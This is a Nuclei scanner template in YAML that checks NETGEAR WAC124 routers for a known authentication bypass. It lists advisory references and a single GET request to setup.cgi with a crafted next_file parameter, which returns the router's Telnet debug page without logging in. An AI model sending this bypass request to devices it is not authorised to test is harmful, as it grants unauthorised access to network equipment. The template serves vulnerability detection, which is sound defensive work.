nuclei-templates/http/vulnerabilities/other/netgear-wac124-router-auth-...

34 lines
1.1 KiB
YAML

id: netgear-wac124-router-auth-bypass
info:
name: NETGEAR WAC124 - Authentication Bypass
author: gy741
severity: high
description: |
NETGEAR WAC124 AC2000 routers contain an authentication bypass vulnerability. An attacker can gain access by bypassing proper authentication, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://flattsecurity.medium.com/finding-bugs-to-trigger-unauthenticated-command-injection-in-a-netgear-router-psv-2022-0044-2b394fb9edc
- https://kb.netgear.com/000064730/Security-Advisory-for-Multiple-Vulnerabilities-on-the-WAC124-PSV-2022-0044
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cwe-id: CWE-287
tags: netgear,auth-bypass,router,iot
metadata:
max-request: 1
http:
- method: GET
path:
- "{{BaseURL}}/setup.cgi?next_file=debug.htm&x=currentsetting.htm"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Enable Telnet"